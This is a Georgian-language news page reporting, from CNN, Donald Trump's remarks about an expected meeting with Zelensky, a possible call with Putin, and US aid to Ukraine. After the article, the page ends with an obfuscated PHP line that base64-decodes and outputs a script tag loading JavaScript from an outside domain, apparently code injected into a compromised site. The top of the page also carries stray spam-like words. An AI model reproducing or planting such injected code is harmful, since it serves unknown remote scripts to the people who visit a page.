tube
ავერსი jaluzi

დონალდ ტრამპის განცხადებით, ის მომავალ კვირას უკრაინის პრეზიდენტ ვოლოდიმირ ზელენსკისთან შეხვედრას ელის და "სავარაუდოდ" რუსეთის პრეზიდენტ ვლადიმერ პუტინთანაც ისაუბრებს. ამის შესახებ ინფორმაციას CNN-ი ავრცელებს.

"მომავალ კვირას სავარაუდოდ, პრეზიდენტ ზელენსკის შევხვდები, და სავარაუდოდ, პრეზიდენტ პუტინთან ვილაპარაკებ. ამ ომის დასრულება მსურს", - განაცხადა ტრამპმა.

კითხვაზე, ზელენსკისთან შეხვედრა ვაშინგტონში თუ გაიმართება, ტრამპმა უპასუხა, რომ "შეიძლება ვაშინგტონში იყოს, იქ [კიევში] არ ჩავდივარ".

ტრამპმა ასევე ისაუბრა უკრაინისთვის რუსეთის წინააღმდეგ ომში ფინანსურ და სამხედრო დახმარებაზე, რომელსაც აშშ აწვდის.

"ერთ-ერთი რამ, რასაც პრეზიდენტ ზელენსკისთან ველით, არის მათი აქტივების უსაფრთხოება. ასევე პრეზიდენტ ზელენსკისგან მოვითხოვთ ამ თანხების ჯეროვნად მოხმარებას", - განაცხადა ტრამპმა.

ცნობისთვის, მომავალ კვირას ზელენსკი მიუნხენის უსაფრთხოების კონფერენციას დაესწრება, რომელშიც ასევე მონაწილეობას მიიღებენ აშშ-ის ვიცე-პრეზიდენტი ჯეიდი ვენსი და უკრაინისა და რუსეთის საკითხებში სპეციალური წარმომადგენელი, კიტ კელოგი, მაგრამ დონალდ ტრამპი არა.

90
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");